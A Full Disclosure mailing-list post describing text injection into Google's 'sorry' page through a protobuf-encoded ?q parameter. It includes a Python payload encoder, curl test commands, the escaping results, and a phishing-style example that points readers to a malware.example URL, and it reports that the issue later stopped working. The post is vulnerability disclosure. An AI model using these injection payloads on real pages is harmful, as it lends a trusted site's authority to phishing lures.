I tested a few more times, and it appears the text injection has disappeared.
These are timestamps when I tested, with offsets relative to the initial discovery. +0h 2025-01-28 03:00 initial discovery +5h 2025-01-28 08:19 ?q=EgtoZWxsbyB3b3JsZA works (https://archive.is/DD9xB) +14h 2025-01-28 17:31 ?q=EgtoZWxsbyB3b3JsZA works (no archive) +45h 2025-01-30 00:18 ?q=EgtoZWxsbyB3b3JsZA doesn't work (https://archive.is/0PJRW) On Tue, Jan 28, 2025 at 02:26:16AM -0700, David Fifield wrote: > The page https://www.google.com/sorry/index is familiar to Tor and VPN > users. It is the one that says "Our systems have detected unusual > traffic from your computer network. Please try your request again > later." You will frequently be redirected to this page when using Tor > Browser, when you do a search on a Google site such as www.youtube.com > or scholar.google.com. The text of the page reports the client IP > address, a timestamp of the request, and the URL that was requested. > > At 2025-01-28 03:00 or earlier, the "sorry" page changed its behavior > from what I have seen before. After the client IP address, the page now > displays " ≠ ", followed by a few apparently nonsense bytes (not even > necessarily properly UTF-8–encoded). The extra bytes turn out to come > from a data structure that is encoded in the ?q URL query parameter. By > changing the ?q parameter, you can make the string of bytes have any > length and contents you like. The byte string will be included in the > HTML body, after the client IP address and " ≠ ". However, any bytes > that have meaning in HTML will be HTML-escaped, so while you can make > text appear on the page, no XSS is possible, as far as I can tell. > > This is a simple demonstration: > > https://www.google.com/sorry/index?q=EgtoZWxsbyB3b3JsZA > (archived) https://archive.is/DD9xB > > This displays: > > IP address: <client IP address> ≠ hello world > > Let's decode the ?q payload to see what's going on. > > $ python3 -c 'import base64; > print(repr(base64.urlsafe_b64decode("EgtoZWxsbyB3b3JsZA==")))' > b'\x12\x0bhello world' > > After base64 decoding, the first byte is 0x12, which is some kind of > data type indicator. The second byte, 0x0b, is the length of the value > to follow. Then the value is what ends up being copied into the page. > > The length field is actually a Protobuf varint. Lengths greater than 127 > need to be encoded as more than 1 byte: > https://protobuf.dev/programming-guides/encoding/#varints > The following is a Python program to encode arbitrary byte strings > appropriately for the ?q parameter: > > #!/usr/bin/env python3 > import base64 > import sys > if len(sys.argv) > 1: > payload, = sys.argv[1:] > payload = payload.encode() > else: > payload = sys.stdin.buffer.read() > def encode_varint(n): > e = [n & 0x7f] > n >>= 7 > while n > 0: > e[len(e) - 1] |= 0x80 > e.append(n & 0x7f) > n >>= 7 > return bytes(e) > print(base64.urlsafe_b64encode(b"\x12" + encode_varint(len(payload)) + > payload).rstrip(b"=").decode()) > > Use it as follows, for example: > > $ curl "https://www.google.com/sorry/index?q=$(printf 'hello world' | > ./sorry-payload)" > > You can see what HTML escaping the server applies by sending a string > that consists of every byte value: > > $ curl "https://www.google.com/sorry/index?q=$(for c in $(seq 0 255); > do printf '\x'$(printf %02x $c); done | ./sorry-payload)" -o resp > > 00000000: 0001 0203 0405 0607 0820 2020 2020 0e0f ......... .. > 00000010: 1011 1213 1415 1617 1819 1a1b 1c1d 1e1f ................ > 00000020: 2021 2671 756f 743b 2324 2526 616d 703b !"#$%& > 00000030: 2623 3339 3b28 292a 2b2c 2d2e 2f30 3132 '()*+,-./012 > 00000040: 3334 3536 3738 393a 3b26 6c74 3b3d 2667 3456789:;<=&g > 00000050: 743b 3f40 4142 4344 4546 4748 494a 4b4c t;?@ABCDEFGHIJKL > 00000060: 4d4e 4f50 5152 5354 5556 5758 595a 5b5c MNOPQRSTUVWXYZ[\ > 00000070: 5d5e 5f60 6162 6364 6566 6768 696a 6b6c ]^_`abcdefghijkl > 00000080: 6d6e 6f70 7172 7374 7576 7778 797a 7b7c mnopqrstuvwxyz{| > 00000090: 7d7e 7f80 8182 8384 8586 8788 898a 8b8c }~.............. > 000000a0: 8d8e 8f90 9192 9394 9596 9798 999a 9b9c ................ > 000000b0: 9d9e 9fa0 a1a2 a3a4 a5a6 a7a8 a9aa abac ................ > 000000c0: adae afb0 b1b2 b3b4 b5b6 b7b8 b9ba bbbc ................ > 000000d0: bdbe bfc0 c1c2 c3c4 c5c6 c7c8 c9ca cbcc ................ > 000000e0: cdce cfd0 d1d2 d3d4 d5d6 d7d8 d9da dbdc ................ > 000000f0: ddde dfe0 e1e2 e3e4 e5e6 e7e8 e9ea ebec ................ > 00000100: edee eff0 f1f2 f3f4 f5f6 f7f8 f9fa fbfc ................ > 00000110: fdfe ff ... > > The following replacements are applied: > > 0x09 HT becomes 0x20 > 0x0a LF becomes 0x20 > 0x0b VT becomes 0x20 > 0x0c FF becomes 0x20 > 0x0d CR becomes 0x20 > 0x22 " becomes " > 0x26 & becomes & > 0x27 ' becomes ' > 0x3c < becomes < > 0x3e > becomes > > > Besides 0x12, there are other type codes normally present in the ?q > parameter. Collect a few ?q parameter values organically, base64 decode > them, and you will see similar structures and repeated byte strings. If > ?q contains more than one 0x12 specification, it looks like the last one > wins. In the ?q values I saw, the 0x12 value was 4 bytes long, and > contained the IPv4 address of a Tor exit node. The " ≠ " after the > textual client IP address makes it look like it's some debugging code > related to IP address comparison. > > You can get the "sorry" page in languages other than English using > either the ?hl URL query parameter or the Accept-Language HTTP header. > The languages I tried used the same escaping as the default English one. > The ?ie and ?oe (input encoding and output encoding; > https://developers.google.com/custom-search/docs/xml_results#wsCharacterEncoding) > parameters do not appear to have any effect. > > $ curl "https://www.google.com/sorry/index?q=$(printf 'hello world' | > ./sorry-payload)" -H 'Accept-Language: zh-CN' > https://www.google.com/sorry/index?q=EgtoZWxsbyB3b3JsZA&hl=zh-CN > (archive) https://archive.is/P6dbS > > Though it's not possible to inject active content such as HTML or > JavaScript, one could cause a phishing-style plaintext URL to appear on > the page: > > $ curl "https://www.google.com/sorry/index?q=$(printf 'Copy and paste > this URL to fix the problem: \u27a1\ufe0fhttp://malware.example/\u2b05\ufe0f' > | ./sorry-payload)" > > https://www.google.com/sorry/index?q=Ek9Db3B5IGFuZCBwYXN0ZSB0aGlzIFVSTCB0byBmaXggdGhlIHByb2JsZW06IOKeoe-4j2h0dHA6Ly9tYWx3YXJlLmV4YW1wbGUv4qyF77iP > (archive) https://archive.is/D8cf4 > > Similar tricks are possible with the ?continue URL query parameter, > which is omitted in the above examples, but which normally appears in > redirections to https://www.google.com/sorry/index. The contents of > ?continue get inserted after the "URL: " label on the page. _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: https://seclists.org/fulldisclosure/